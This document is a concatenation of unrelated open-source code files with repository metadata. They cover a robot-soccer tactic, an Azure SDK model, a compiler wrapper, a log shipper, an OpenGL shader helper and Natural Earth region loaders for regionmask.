"ref": "refs/heads/master",
"path": "mygrations/tests/integration/table_return_create_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "416430"
},
{
"name": "Shell",
"bytes": "331"
}
],
"symlink_target": ""
}
|
import math
import numpy as np
import time
from RULEngine.Debug.debug_interface import DebugInterface
from RULEngine.Util.Pose import Pose
from RULEngine.Util.Position import Position
from RULEngine.Util.constant import PLAYER_PER_TEAM, POSITION_DEADZONE, BALL_RADIUS, ROBOT_RADIUS
from RULEngine.Util.geometry import get_angle
from RULEngine.Util.geometry import get_distance
from ai.STA.Action.AllStar import AllStar
from ai.STA.Action.Idle import Idle
from ai.STA.Action.Kick import Kick
from ai.STA.Action.MoveToPosition import MoveToPosition
from ai.STA.Action.grab import Grab
from ai.STA.Tactic.GoToPositionNoPathfinder import GoToPositionNoPathfinder
from ai.STA.Tactic.GoGetBall import GoGetBall
from ai.STA.Tactic.Tactic import Tactic
from ai.STA.Tactic.tactic_constants import Flags
from ai.Util.ai_command import AICommand, AICommandType
from ai.STA.Action.GoBehind import GoBehind
__author__ = 'RoboCupULaval'
POSITION_DEADZONE = 40
ORIENTATION_DEADZONE = 0.2
DISTANCE_TO_KICK_REAL = ROBOT_RADIUS * 3.4
DISTANCE_TO_KICK_SIM = ROBOT_RADIUS + BALL_RADIUS
COMMAND_DELAY = 1.5
class Capture(Tactic):
"""
méthodes:
exec(self) : Exécute une Action selon l'état courant
attributs:
game_state: L'état courant du jeu.
player_id : Identifiant du joueur auquel est assigné la tactique
current_state : L'état courant de la tactique
next_state : L'état suivant de la tactique
status_flag : L'indicateur de progression de la tactique
target: Position à laquelle faire face après avoir pris la balle
"""
def __init__(self, p_game_state, player_id, target=Pose(), args=None):
Tactic.__init__(self, p_game_state, player_id, target, args)
assert isinstance(player_id, int)
assert PLAYER_PER_TEAM >= player_id >= 0
self.player_id = player_id
self.current_state = self.get_behind_ball
self.next_state = self.get_behind_ball
self.debug_interface = DebugInterface()
self.target = target
def get_behind_ball(self):
# print('Etat = go_behind')
self.status_flag = Flags.WIP
player_x = self.game_state.game.friends.players[self.player_id].pose.position.x
player_y = self.game_state.game.friends.players[self.player_id].pose.position.y
ball_x = self.game_state.get_ball_position().x
ball_y = self.game_state.get_ball_position().y
vector_player_2_ball = np.array([ball_x - player_x, ball_y - player_y])
vector_player_2_ball /= np.linalg.norm(vector_player_2_ball)
if self._is_player_towards_ball_and_target():
self.next_state = self.grab_ball
self.orientation_target = self.game_state.game.friends.players[self.player_id].pose.orientation
else:
self.next_state = self.get_behind_ball
return GoBehind(self.game_state, self.player_id,
self.game_state.get_ball_position(),
self.target.position,
120,
pathfinding=True)
def grab_ball(self):
# print('Etat = grab_ball')
# self.debug.add_log(1, "Grab ball called")
# self.debug.add_log(1, "vector player 2 ball : {} mm".format(self.vector_norm))
if self._get_distance_from_ball() < 120:
self.next_state = self.keep
elif self._is_player_towards_ball_and_target(-0.9):
self.next_state = self.grab_ball
else:
self.next_state = self.get_behind_ball
# self.debug.add_log(1, "orientation go get ball {}".format(self.last_angle))
return Grab(self.game_state, self.player_id)
def keep(self):
# print('Etat = keep')
# self.debug.add_log(1, "Grab ball called")
# self.debug.add_log(1, "vector player 2 ball : {} mm".format(self.vector_norm))
if self._get_distance_from_ball() < 120:
self.next_state = self.keep
self.status_flag = Flags.SUCCESS
elif self._is_player_towards_ball_and_target(-0.4):
self.next_state = self.grab_ball
self.status_flag = Flags.WIP
else:
self.next_state = self.get_behind_ball
self.status_flag = Flags.WIP
# self.debug.add_log(1, "orientation go get ball {}".format(self.last_angle))
return Idle(self.game_state, self.player_id)
def _get_distance_from_ball(self):
return get_distance(self.game_state.get_player_pose(self.player_id).position,
self.game_state.get_ball_position())
def _is_player_towards_ball_and_target(self, fact=-0.99):
player = self.game_state.get_player_position(self.player_id).conv_2_np()
ball = self.game_state.get_ball_position().conv_2_np()
target = self.target.position.conv_2_np()
vector_player_2_ball = ball - player
vector_target_2_ball = ball - target
if not (np.linalg.norm(vector_player_2_ball) == 0):
vector_player_2_ball /= np.linalg.norm(vector_player_2_ball)
if not (np.linalg.norm(vector_target_2_ball) == 0):
vector_target_2_ball /= np.linalg.norm(vector_target_2_ball)
vector_player_dir = np.array([np.cos(self.game_state.game.friends.players[self.player_id].pose.orientation),
np.sin(self.game_state.game.friends.players[self.player_id].pose.orientation)])
if np.dot(vector_player_2_ball, vector_target_2_ball) < fact:
if np.dot(vector_player_dir, vector_target_2_ball) < fact:
return True
return False
def _is_player_towards_target(self, fact=-0.99):
player = self.game_state.game.friends.players[self.player_id].pose.position.conv_2_np()
target = self.target.position.conv_2_np()
vector_target_2_player = player - target
vector_target_2_player /= np.linalg.norm(vector_target_2_player)
vector_player_dir = np.array([np.cos(self.game_state.game.friends.players[self.player_id].pose.orientation),
np.sin(self.game_state.game.friends.players[self.player_id].pose.orientation)])
if np.dot(vector_player_dir, vector_target_2_player) < fact:
return True
return False
def _reset_ttl(self):
super()._reset_ttl()
if get_distance(self.last_ball_position, self.game_state.get_ball_position()) > POSITION_DEADZONE:
self.last_ball_position = self.game_state.get_ball_position()
self.move_action = self._generate_move_to()
|
{
"content_hash": "a03d8c6fba2a38abbf2a880bc19e43a6",
"timestamp": "",
"source": "github",
"line_count": 149,
"max_line_length": 117,
"avg_line_length": 44.241610738255034,
"alnum_prop": 0.6456310679611651,
"repo_name": "Gagnon06/StrategyIA",
"id": "ddd73e7892d360e7e47fc4e6f314a34cf382d681",
"size": "6638",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "ai/STA/Tactic/capture.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "207240"
},
{
"name": "Protocol Buffer",
"bytes": "30229"
},
{
"name": "Python",
"bytes": "1451293"
}
],
"symlink_target": ""
}
|
try:
localscene
except:
import localscene
else:
localscene = reload(localscene)
from localscene import LocalScene, getLocalScene
|
{
"content_hash": "7e9cd3d2eef6bff79aaf0c96b0227a08",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 48,
"avg_line_length": 14.4,
"alnum_prop": 0.75,
"repo_name": "antont/tundra",
"id": "73a567176dd7c8a80d33f6f573c727795c4970a9",
"size": "209",
"binary": false,
"copies": "1",
"ref": "refs/heads/tundra2",
"path": "src/Application/PythonScriptModule/pymodules_old/localscene/__init__.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "110345"
},
{
"name": "C#",
"bytes": "76173"
},
{
"name": "C++",
"bytes": "4959154"
},
{
"name": "CoffeeScript",
"bytes": "2229"
},
{
"name": "JavaScript",
"bytes": "316308"
},
{
"name": "Objective-C",
"bytes": "222359"
},
{
"name": "Python",
"bytes": "999850"
},
{
"name": "Shell",
"bytes": "8224"
},
{
"name": "TypeScript",
"bytes": "230019"
}
],
"symlink_target": ""
}
|
from fjord.base.tests import TestCase
from fjord.translations import gengo_utils
from fjord.translations.models import SuperModel
from fjord.translations.utils import translate
class TestGeneralTranslate(TestCase):
def setUp(self):
gengo_utils.GENGO_LANGUAGE_CACHE = (
{u'opstat': u'ok',
u'response': [
{u'unit_type': u'word', u'localized_name': u'Espa\xf1ol',
u'lc': u'es', u'language': u'Spanish (Spain)'}
]},
(u'es',)
)
def test_translate_fake(self):
obj = SuperModel(locale='br', desc=u'This is a test string')
obj.save()
assert obj.trans_desc == u''
translate(obj, 'fake', 'br', 'desc', 'en', 'trans_desc')
assert obj.trans_desc == u'THIS IS A TEST STRING'
def test_translate_dennis(self):
obj = SuperModel(locale='fr', desc=u'This is a test string')
obj.save()
assert obj.trans_desc == u''
translate(obj, 'dennis', 'br', 'desc', 'en', 'trans_desc')
assert obj.trans_desc == u'\xabTHIS IS A TEST STRING\xbb'
|
{
"content_hash": "041d65e66cbe79e25abdcd9f52c599ef",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 74,
"avg_line_length": 34.75,
"alnum_prop": 0.5827338129496403,
"repo_name": "Ritsyy/fjord",
"id": "74c52ad9d04595f4d2f9f0804cb542b1bb0f74e5",
"size": "1112",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "fjord/translations/tests/test_utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "158694"
},
{
"name": "HTML",
"bytes": "128135"
},
{
"name": "JavaScript",
"bytes": "302359"
},
{
"name": "Python",
"bytes": "884131"
},
{
"name": "Shell",
"bytes": "11743"
},
{
"name": "Smarty",
"bytes": "825"
}
],
"symlink_target": ""
}
|
from msrest.serialization import Model
class NextHopResult(Model):
"""The information about next hop from the specified VM.
:param next_hop_type: Next hop type. Possible values include: 'Internet',
'VirtualAppliance', 'VirtualNetworkGateway', 'VnetLocal',
'HyperNetGateway', 'None'
:type next_hop_type: str or
~azure.mgmt.network.v2016_09_01.models.NextHopType
:param next_hop_ip_address: Next hop IP Address
:type next_hop_ip_address: str
:param route_table_id: The resource identifier for the route table
associated with the route being returned. If the route being returned does
not correspond to any user created routes then this field will be the
string 'System Route'.
:type route_table_id: str
"""
_attribute_map = {
'next_hop_type': {'key': 'nextHopType', 'type': 'str'},
'next_hop_ip_address': {'key': 'nextHopIpAddress', 'type': 'str'},
'route_table_id': {'key': 'routeTableId', 'type': 'str'},
}
def __init__(self, *, next_hop_type=None, next_hop_ip_address: str=None, route_table_id: str=None, **kwargs) -> None:
super(NextHopResult, self).__init__(**kwargs)
self.next_hop_type = next_hop_type
self.next_hop_ip_address = next_hop_ip_address
self.route_table_id = route_table_id
|
{
"content_hash": "c24be4fbcc0c3bc3e4147e04d2a51f79",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 121,
"avg_line_length": 42.74193548387097,
"alnum_prop": 0.6588679245283019,
"repo_name": "lmazuel/azure-sdk-for-python",
"id": "648de03fb284aa08ae1cc75420519a239dfea288",
"size": "1799",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azure-mgmt-network/azure/mgmt/network/v2016_09_01/models/next_hop_result_py3.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "42572767"
}
],
"symlink_target": ""
}
|
import types
from b3.tools.compilers.cc import CC
# TODO(team): review catalina compiler support.
class CatalinaCompiler(CC):
"""Catalina is based upon LCC (a robust, widely used and portable C compiler
front-end), with a custom back-end that generates Large Memory Model (LMM)
PASM code for the Propeller.
"""
DEFAULT_SOURCE_EXTENSIONS = [".c", ".C", ".spin"]
DEFAULT_EXECUTABLES = {
"compiler" : ["catalina"],
"linker_exe" : ["catalina"]
}
def __init__(self, verbose=False, dry_run=False):
CC.__init__(self, verbose, dry_run)
def define_macro(self, name, value=None, c_symbol=False):
"""Define a preprocessor macro for all compilations driven by this compiler
object. The macro has two optional parameters. The optional parameter
'value' should be a string; if it is not supplied, then the macro will be
defined without an explicit value and the exact outcome depends on the
compiler used (XXX true? does ANSI say anything about this?). The optional
parameter 'c_symbol' indicates whether it's a C symbol or a SPIN symbol.
"""
# Delete from the list of macro definitions/undefinitions if
# already there (so that this one will take precedence).
i = self._find_macro(name)
if i is not None:
del self.macros[i]
defn = ((name, value), c_symbol)
self.macros.append(defn)
def _gen_preprocess_macro_options(self, macros):
"""Catalina uses -D to define SPIN symbols. To define the C symbol XXX on
the command line use -W-DXXX. Note there should be no space between the D
and the XXX. Also note that when you define SPIN symbol XXX, Catalina
automatically defines a C symbol __Catalina_XXX.
"""
options = []
for macro, c_symbol in macros:
if not (type(macro) is types.TupleType and 1<= len(macro) <= 2):
raise TypeError("bad macro definition " + repr(macro) + ": " +
"each element of 'macros' list must be a 1- or 2-tuple")
before = ''
if c_symbol:
before = '-W' # add -W option to define C symbol
if len(macro) == 1:
options.append("%s-U%s" % (before, macro[0]))
elif len(macro) == 2:
if macro[1] is None: # define with no explicit value
options.append("%s-D%s" % (before, macro[0]))
else:
# XXX *don't* need to be clever about quoting the
# macro value here, because we're going to avoid the
# shell at all costs when we spawn the command!
options.append("%s-D%s=%s" % ((before, ) + macro))
elif len(macro) == 3:
if macro[1] is None: # define with no explicit value
options.append("%s-D%s" % (before, macro[0]))
else:
# XXX *don't* need to be clever about quoting the
# macro value here, because we're going to avoid the
# shell at all costs when we spawn the command!
options.append("%s-D%s=%s" % ((before,) + macro))
return options
def _gen_cc_options(self, pp_opts, debug, before):
cc_opts = CC._gen_cc_options(self, pp_opts, debug, before)
if self.verbose:
cc_opts[:0] = ['-v']
return cc_opts
def _gen_ld_options(self, debug, before):
ld_opts = UnixCCompiler._gen_ld_options(self, debug, before)
if self.verbose:
ld_opts[:0] = ['-v']
# Add macro!
ld_opts.extend(self._gen_preprocess_options(self.macros, []))
return ld_opts
|
{
"content_hash": "649cf2d301dd60fd3650a5aea0d80581",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 80,
"avg_line_length": 39.895348837209305,
"alnum_prop": 0.6304284465170504,
"repo_name": "robionica/b3",
"id": "497b6a155021fdd2e5823c191a698f3c8e29707d",
"size": "4054",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/main/python/b3/tools/compilers/catalina.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "143712"
},
{
"name": "Shell",
"bytes": "274"
}
],
"symlink_target": ""
}
|
import asyncio
import logging
import abc
from functools import partial
from lsshipper.connection import logstash_connection
from lsshipper.common.utils import get_files
from lsshipper.common.files import File, ship
from lsshipper.database import DataBase
logger = logging.getLogger(name="general")
class BaseUploader(metaclass=abc.ABCMeta):
def __init__(self, loop, state, config):
self.files_in_work = set()
self.loop = loop
self.state = state
self.config = config
self.queue = asyncio.Queue(maxsize=10, loop=self.loop)
self.con = asyncio.ensure_future(
logstash_connection(queue=self.queue, state=self.state,
loop=self.loop, config=self.config))
async def get_files_to_upload(self):
async for f in get_files(
self.loop,
self.config['files']['dir_path'],
self.config['files']['pattern']):
if f['name'] in self.files_in_work:
continue
with DataBase(self.config['database']['file']) as db:
f = db.sync_from_db(f)
f = File(**f, sep=self.config['files']['newline'])
if f.need_update:
yield f
def end_of_upload(self, f, finished):
self.files_in_work.remove(f.name)
if finished:
f.last_mtime = f.mtime
with DataBase(self.config['database']['file']) as db:
db.update_file(f.name, f.offset, f.last_mtime)
@abc.abstractmethod
def start():
raise NotImplemented
class Uploader(BaseUploader):
async def start(self):
while not self.state.need_shutdown:
logger.debug("files in work: {}".format(self.files_in_work))
async for f in self.get_files_to_upload():
task = asyncio.ensure_future(
ship(f, self.state, self.queue, self.config['fields']))
task.add_done_callback(partial(
lambda f, fut: self.end_of_upload(f, fut.result()), f))
self.files_in_work.add(f.name)
await asyncio.sleep(3.14)
logger.debug("queue size: {}".format(self.queue.qsize()))
await self.con
class OneTimeUploader(BaseUploader):
async def start(self):
async for f in self.get_files_to_upload():
if self.state.need_shutdown:
break
if f.need_update:
self.files_in_work.add(f.name)
finished = await ship(
f, self.state, self.queue, self.config['fields'])
self.end_of_upload(f, finished)
self.state.shutdown()
await self.con
|
{
"content_hash": "878711198cbb65a45e04309a710e6f97",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 75,
"avg_line_length": 35.53947368421053,
"alnum_prop": 0.5764531654942614,
"repo_name": "stavinsky/lsshipper",
"id": "88f4b559ea972374aeb880f1b8587bccc9fd1f62",
"size": "2701",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lsshipper/uploaders/_uploader.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19205"
}
],
"symlink_target": ""
}
|
import ctypes as ct
import pyglet.gl as gl
class Shader:
"""A helper class for compiling and communicating with shader programs.
"""
def __init__(self, vert_files, frag_files):
"""
Parameters
----------
:vert_files: a list of files that contain the vertex shader code.
:frag_files: a list of files that contain the fragment shader code
"""
self.program = gl.glCreateProgram()
self.compile_and_attach_shader(vert_files, gl.GL_VERTEX_SHADER)
self.compile_and_attach_shader(frag_files, gl.GL_FRAGMENT_SHADER)
self.link()
def compile_and_attach_shader(self, shader_files, shader_type):
"""
Parameters
----------
:shader_files: a list of shader files.
:shader_type: `GL_VERTEX_SHADER` or `GL_FRAGMENT_SHADER`.
Main steps to compile and attach a shader:
1. glCreateShader:
create a shader of given type.
2. glShaderSource:
load source code into the shader.
3. glCompileShader:
compile the shader.
4. glGetShaderiv:
retrieve the compiling status.
5. glGetShaderInfoLog:
print the error info if compiling failed.
6. glAttachShader:
attach the shader to our program if compiling succeeded.
"""
src = []
for src_f in shader_files:
with open(src_f, "r") as f:
src.append(f.read().encode("ascii"))
# 1. create a shader
shader = gl.glCreateShader(shader_type)
# 2. load source code into the shader
src_p = (ct.c_char_p * len(src))(*src)
gl.glShaderSource(
shader,
len(src),
ct.cast(ct.pointer(src_p), ct.POINTER(ct.POINTER(ct.c_char))),
None,
)
# 3. compile the shader
gl.glCompileShader(shader)
# 4. retrieve the compiling status
compile_status = gl.GLint(0)
gl.glGetShaderiv(shader, gl.GL_COMPILE_STATUS, ct.byref(compile_status))
# 5. if compiling failed then print the error log
if not compile_status:
info_length = gl.GLint(0)
gl.glGetShaderiv(shader, gl.GL_INFO_LOG_LENGTH, ct.byref(info_length))
error_info = ct.create_string_buffer(info_length.value)
gl.glGetShaderInfoLog(shader, info_length, None, error_info)
print(error_info.value.decode("ascii"))
# 6. else attach the shader to our program
else:
gl.glAttachShader(self.program, shader)
gl.glDeleteShader(shader)
def link(self):
"""
Main steps to link the program:
1. glLinkProgram:
link the shaders to create an executable
2. glGetProgramiv:
retrieve the link status
3. glGetProgramInfoLog:
print the error log if link failed
"""
gl.glLinkProgram(self.program)
link_status = gl.GLint(0)
gl.glGetProgramiv(self.program, gl.GL_LINK_STATUS, ct.byref(link_status))
if not link_status:
info_length = gl.GLint(0)
gl.glGetProgramiv(
self.program, gl.GL_INFO_LOG_LENGTH, ct.byref(info_length)
)
error_info = ct.create_string_buffer(info_length.value)
gl.glGetProgramInfoLog(self.program, info_length, None, error_info)
print(error_info.value)
def bind(self):
gl.glUseProgram(self.program)
def unbind(self):
gl.glUseProgram(0)
def __enter__(self):
self.bind()
return self
def __exit__(self, exception_type, exception_value, traceback):
self.unbind()
def uniformi(self, name, *data):
location = gl.glGetUniformLocation(self.program, name.encode("ascii"))
{1: gl.glUniform1i, 2: gl.glUniform2i, 3: gl.glUniform3i, 4: gl.glUniform4i}[
len(data)
](location, *data)
def uniformf(self, name, *data):
location = gl.glGetUniformLocation(self.program, name.encode("ascii"))
{1: gl.glUniform1f, 2: gl.glUniform2f, 3: gl.glUniform3f, 4: gl.glUniform4f}[
len(data)
](location, *data)
def uniformfv(self, name, size, data):
data_ctype = (gl.GLfloat * len(data))(*data)
location = gl.glGetUniformLocation(self.program, name.encode("ascii"))
{
1: gl.glUniform1fv,
2: gl.glUniform2fv,
3: gl.glUniform3fv,
4: gl.glUniform4fv,
}[len(data) // size](location, size, data_ctype)
def vertex_attrib(self, name, data, size=2, stride=0, offset=0):
"""
Set vertex attribute data in a shader, lacks the flexibility of
setting several attributes in one vertex buffer.
Parameters
----------
:name: the attribute name in the shader.
:data: a list of vertex attributes (positions, colors, ...)
Example: name = "positions", data = [0, 0, 0, 1, 1, 0, 1, 1].
"""
data_ctype = (gl.GLfloat * len(data))(*data)
vbo_id = gl.GLuint(0)
gl.glGenBuffers(1, ct.byref(vbo_id))
gl.glBindBuffer(gl.GL_ARRAY_BUFFER, vbo_id)
gl.glBufferData(
gl.GL_ARRAY_BUFFER, ct.sizeof(data_ctype), data_ctype, gl.GL_STATIC_DRAW
)
location = gl.glGetAttribLocation(self.program, name.encode("ascii"))
gl.glEnableVertexAttribArray(location)
gl.glVertexAttribPointer(
location, size, gl.GL_FLOAT, gl.GL_FALSE, stride, ct.c_void_p(offset)
)
gl.glBindBuffer(gl.GL_ARRAY_BUFFER, 0)
return vbo_id
|
{
"content_hash": "7af615a7766d826416b60d11c8f73289",
"timestamp": "",
"source": "github",
"line_count": 165,
"max_line_length": 85,
"avg_line_length": 34.515151515151516,
"alnum_prop": 0.5829675153643546,
"repo_name": "neozhaoliang/pywonderland",
"id": "a6ca5595eec8e509543406515eb3557fbf8652f9",
"size": "5695",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/glslhelpers/shader.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "GLSL",
"bytes": "201018"
},
{
"name": "Jupyter Notebook",
"bytes": "13368"
},
{
"name": "POV-Ray SDL",
"bytes": "15071"
},
{
"name": "Python",
"bytes": "271784"
},
{
"name": "Shell",
"bytes": "200"
}
],
"symlink_target": ""
}
|
import os
import warnings
from abc import ABC, abstractmethod
from contextlib import contextmanager
from dataclasses import dataclass
import numpy as np
import pooch
from packaging.version import Version
from shapely.geometry import MultiPolygon
from ..core.regions import Regions
from ..core.utils import _flatten_polygons
# TODO: remove deprecated (v0.9.0) natural_earth class and instance & clean up
ALTERNATIVE = (
"Please use ``regionmask.defined_regions.natural_earth_v4_1_0`` or "
"``regionmask.defined_regions.natural_earth_v5_0_0`` instead"
)
def _maybe_get_column(df, colname):
"""return column of the df or not"""
if isinstance(colname, str):
# getattr also works for index (df['index'] does not)
# try lower and upper, github #25
if hasattr(df, colname):
return getattr(df, colname)
elif hasattr(df, colname.swapcase()):
return getattr(df, colname.swapcase())
else:
msg = "'{}' (and '{}') not on the geopandas dataframe."
raise KeyError(msg.format(colname, colname.swapcase()))
else:
return colname
def _obtain_ne(
shpfilename,
title,
names="name",
abbrevs="postal",
numbers="index",
coords="geometry",
query=None,
combine_coords=False,
preprocess=None,
):
"""
create Regions object from naturalearth data
http://www.naturalearthdata.com
Parameters
----------
shpfilename : string
Filename to read.
title : string
Displayed text in Regions.
names : str or list, default: "name"
Names of the single regions. If string, obtains them from the geopandas
DataFrame, else uses the provided list.
abbrevs : str or list, default: "postal".
Abbreviations of the single regions. If string obtains them from the
geopandas DataFrame, else uses the provided list.
numbers : str or list, default: "index".
Numbers of the single regions. If string obtains them from the geopandas
DataFrame, else uses the provided list.
coords : string or list, default: "geometry".
Coordinates of the single regions. If string obtains them from the
geopandas DataFrame, else uses the provided list.
query : None or string, optional
If given, the geopandas DataFrame is subset with df.query(query).
Default: None.
combine_coords : bool, optional
If False, uses the coords as is, else combines them all to a shapely
MultiPolygon (used to combine all land Polygons). Default: False.
preprocess : callable, optional
If provided, call this function on the geodataframe.
"""
import geopandas
# read the file with geopandas
df = geopandas.read_file(shpfilename, encoding="utf8")
if query is not None:
df = df.query(query).reset_index(drop=True)
if preprocess is not None:
df = preprocess(df)
# get necessary data for Regions_cls
numbers = _maybe_get_column(df, numbers)
names = _maybe_get_column(df, names)
abbrevs = _maybe_get_column(df, abbrevs)
coords = _maybe_get_column(df, coords)
# create one MultiPolygon of all Polygons (used for land)
if combine_coords:
coords = _flatten_polygons(coords)
coords = [MultiPolygon(coords)]
# make sure numbers is a list
numbers = np.array(numbers)
source = "http://www.naturalearthdata.com"
return Regions(
coords,
numbers=numbers,
names=names,
abbrevs=abbrevs,
name=title,
source=source,
overlap=False,
)
VERSIONS = ["v4.1.0", "v5.0.0"]
@dataclass
class _NaturalEarthFeature:
resolution: str
category: str
name: str
def fetch(self, version):
if version not in VERSIONS:
versions = ", ".join(VERSIONS)
raise ValueError(f"version must be one of {versions}. Got {version}.")
return _fetch_aws(version, self.resolution, self.category, self.name)
def shapefilename(self, version):
fNs = self.fetch(version)
# the comma is required
(fN,) = filter(lambda x: x.endswith(".shp"), fNs)
return fN
_countries_110 = _NaturalEarthFeature(
resolution="110m",
category="cultural",
name="admin_0_countries",
)
_countries_50 = _NaturalEarthFeature(
resolution="50m",
category="cultural",
name="admin_0_countries",
)
_us_states_50 = _NaturalEarthFeature(
resolution="50m",
category="cultural",
name="admin_1_states_provinces_lakes",
)
_us_states_10 = _NaturalEarthFeature(
resolution="10m",
category="cultural",
name="admin_1_states_provinces_lakes",
)
_land_110 = _NaturalEarthFeature(
resolution="110m",
category="physical",
name="land",
)
_land_50 = _NaturalEarthFeature(
resolution="50m",
category="physical",
name="land",
)
_land_10 = _NaturalEarthFeature(
resolution="10m",
category="physical",
name="land",
)
_ocean_basins_50 = _NaturalEarthFeature(
resolution="50m",
category="physical",
name="geography_marine_polys",
)
class NaturalEarth(ABC):
"""class combining all natural_earth features/ geometries
Because data must be downloaded, we organise it as a class so that
we only download it on demand.
"""
def __init__(self):
self._countries_110 = None
self._countries_50 = None
self._us_states_50 = None
self._us_states_10 = None
self._land_110 = None
self._land_50 = None
self._land_10 = None
self._ocean_basins_50 = None
@abstractmethod
def _obtain_ne(self, natural_earth_feature, **kwargs):
...
@property
def countries_110(self):
if self._countries_110 is None:
opt = dict(title="Natural Earth Countries: 110m")
self._countries_110 = self._obtain_ne(_countries_110, **opt)
return self._countries_110
@property
def countries_50(self):
if self._countries_50 is None:
opt = dict(title="Natural Earth Countries: 50m")
self._countries_50 = self._obtain_ne(_countries_50, **opt)
return self._countries_50
@property
def us_states_50(self):
if self._us_states_50 is None:
opt = dict(
title="Natural Earth: US States 50m",
query="admin == 'United States of America'",
)
self._us_states_50 = self._obtain_ne(_us_states_50, **opt)
return self._us_states_50
@property
def us_states_10(self):
if self._us_states_10 is None:
opt = dict(
title="Natural Earth: US States 10m",
query="admin == 'United States of America'",
)
self._us_states_10 = self._obtain_ne(_us_states_10, **opt)
return self._us_states_10
@property
def land_110(self):
if self._land_110 is None:
opt = dict(
title="Natural Earth: landmask 110m",
names=["land"],
abbrevs=["lnd"],
numbers=[0],
combine_coords=True,
)
self._land_110 = self._obtain_ne(_land_110, **opt)
return self._land_110
@property
def land_50(self):
if self._land_50 is None:
opt = dict(
title="Natural Earth: landmask 50m",
names=["land"],
abbrevs=["lnd"],
numbers=[0],
combine_coords=True,
)
self._land_50 = self._obtain_ne(_land_50, **opt)
return self._land_50
@property
def land_10(self):
if self._land_10 is None:
opt = dict(
title="Natural Earth: landmask 10m",
names=["land"],
abbrevs=["lnd"],
numbers=[0],
combine_coords=True,
)
self._land_10 = self._obtain_ne(_land_10, **opt)
return self._land_10
@property
def ocean_basins_50(self):
if self._ocean_basins_50 is None:
opt = dict(
title="Natural Earth: ocean basins 50m",
names="name",
abbrevs="name",
preprocess=self._fix_ocean_basins_50,
)
regs = self._obtain_ne(_ocean_basins_50, **opt)
self._ocean_basins_50 = regs
return self._ocean_basins_50
def __repr__(self):
return "Region Definitions from 'http://www.naturalearthdata.com'."
def _fix_ocean_basins_50_cartopy(self, df):
"""ocean basins 50 has duplicate entries"""
names_v4_1_0 = {
14: "Mediterranean Sea",
30: "Mediterranean Sea",
26: "Ross Sea",
29: "Ross Sea",
}
names_v5_0_0 = {
74: "Great Barrier Reef",
114: "Great Barrier Reef",
}
names_v5_1_2 = {
74: "Great Barrier Reef",
113: "Great Barrier Reef",
}
is_v4_1_0 = all(df.loc[idx]["name"] == name for idx, name in names_v4_1_0.items())
is_v5_0_0 = all(df.loc[idx]["name"] == name for idx, name in names_v5_0_0.items())
is_v5_1_2 = all(df.loc[idx]["name"] == name for idx, name in names_v5_1_2.items())
if is_v4_1_0:
df = _fix_ocean_basins_50_v4_1_0(self, df)
elif is_v5_0_0:
df = _fix_ocean_basins_50_v5_0_0(self, df)
elif is_v5_1_2:
df = _fix_ocean_basins_50_v5_1_2(self, df)
else:
raise ValueError(
"Unknown version of the ocean basins 50m data from naturalearth. "
f"{ALTERNATIVE}."
)
return df
def _fix_ocean_basins_50_v4_1_0(self, df):
"""fix ocean basins 50 for naturalearth v4.1.0
- Mediterranean Sea and Ross Sea have two parts: renamed to Eastern and Western
Basin
"""
new_names = {
14: "Mediterranean Sea Eastern Basin",
30: "Mediterranean Sea Western Basin",
26: "Ross Sea Eastern Basin",
29: "Ross Sea Western Basin",
}
# rename duplicated regions
for idx, new_name in new_names.items():
df.loc[idx, "name"] = new_name
return df
def _unify__great_barrier_reef(df, idx1, idx2):
p1 = df.loc[idx1].geometry
p2 = df.loc[idx2].geometry
# merge the two Great Barrier Reef polygons - idx1 <<< idx2
poly = p1.union(p2)
df.at[idx1, "geometry"] = poly
# remove the now merged row
df = df.drop(labels=idx2).reset_index()
return df
def _fix_ocean_basins_50_v5_0_0(self, df):
"""fix ocean basins 50 for naturalearth v5.0.0
- Mediterranean Sea and Ross Sea is **no longer** split in two.
- There are two regions named Great Barrier Reef - these are now merged
- The numbers/ indices are different from Version 4.0!
"""
return _unify__great_barrier_reef(df, 74, 114)
def _fix_ocean_basins_50_v5_1_2(self, df):
"""fix ocean basins 50 for naturalearth v5.1.2
- Sea of Japan & Korea Strait geometries are different
- the rest (including the split of the Great Barrier Reef) is as in v5.0.0
- but the regions are ordered different
"""
return _unify__great_barrier_reef(df, 74, 113)
class NaturalEarthCartopy(NaturalEarth):
_fix_ocean_basins_50 = _fix_ocean_basins_50_cartopy
def _obtain_ne(self, natural_earth_feature, **kwargs):
shapefilename = _get_shapefilename_cartopy(
natural_earth_feature.resolution,
natural_earth_feature.category,
natural_earth_feature.name,
)
return _obtain_ne(shapefilename, **kwargs)
class NaturalEarth_v4_1_0(NaturalEarth):
_fix_ocean_basins_50 = _fix_ocean_basins_50_v4_1_0
version = "v4.1.0"
def _obtain_ne(self, natural_earth_feature, **kwargs):
shapefilename = natural_earth_feature.shapefilename(self.version)
return _obtain_ne(shapefilename, **kwargs)
class NaturalEarth_v5_0_0(NaturalEarth):
_fix_ocean_basins_50 = _fix_ocean_basins_50_v5_0_0
version = "v5.0.0"
def _obtain_ne(self, natural_earth_feature, **kwargs):
shapefilename = natural_earth_feature.shapefilename(self.version)
return _obtain_ne(shapefilename, **kwargs)
natural_earth = NaturalEarthCartopy()
natural_earth_v4_1_0 = NaturalEarth_v4_1_0()
